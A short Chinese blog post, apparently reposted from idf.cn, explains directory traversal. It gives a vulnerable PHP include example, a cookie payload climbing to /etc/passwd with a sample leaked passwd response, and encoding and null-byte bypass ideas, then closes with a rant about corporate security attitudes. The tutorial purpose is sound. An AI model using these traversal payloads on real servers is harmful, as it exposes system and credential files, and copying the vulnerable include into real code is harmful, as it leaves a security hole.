目錄遍歷漏洞簡述

滲透人員可經過目錄遍歷攻擊獲取服務器的配置文件等等資料。通常的說，它調用服務器的標準API、使用的是文件的標準權限。因此它攻擊的不是什麼漏洞，而是網站設計人員的思想「缺陷」。

常見的目錄遍歷攻擊，訪問「../」這類的上級文件夾的文件。「../」和轉譯攻擊在2000年先後就存在了，只是那時候的攻擊直接在URL裏放字符串就ok了。今天的目錄遍歷攻擊進化了不少。

那麼請容許我犯懶，摘取Wiki的幾個例子：

<?php
$template = 'red.php';
if (isset($_COOKIE['TEMPLATE']))
   $template = $_COOKIE['TEMPLATE'];
include ("/home/users/phpguru/templates/" . $template);
?>

那麼通常來講就能夠在Cookie作手腳（固然這是數次測試以後才能推測的path）：

GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd

而後服務器乖乖的給了回答：

HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh 
daemon:*:1:1::/tmp: 
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh

是否能夠繼續利用轉譯呢，%2e%2e%2f --> "../" ？

<?php
include($_GET['file'] . '.html');
... ...
?>

這種保護是否能夠加個NULL＋轉譯什麼的跳過去？

若是httpd是Apache這類指定Document root的程序，那麼match以後再加 ../ 可能發生什麼？

是否能夠直接執行命令？

我不知道耶！

OWASP有一個cheatsheet。能夠看看。

近日看見友人談到什麼執照的民間反映時重提時這個東西，說好像SP有什麼本身的IT Security Auditing，還號召各位自律、不要對什麼過度行爲做出過度的反映，以暴制暴世所不容……這個時候，我恰巧買了個電視盒子，並且網關是我自建的……你明白什麼了？我可什麼沒說耶！

某些人會說，不須要保證業務穩定運行、不擔憂機密外泄、不怕出醜而損失企業無形資產、只顧忌所謂上級資源（能騙錢就好了）、不須要保護用戶資料、不怕微博轉發500次、有水軍幫忙給好評、有關係給刪帖……

……IT安全真不是啥事，不就是某些人用來向上級騙錢的麼？錢到手怎麼作真是無所謂的。 

相比之下，安全不是問題，人是更嚴重的問題啊！

---

via idf.cn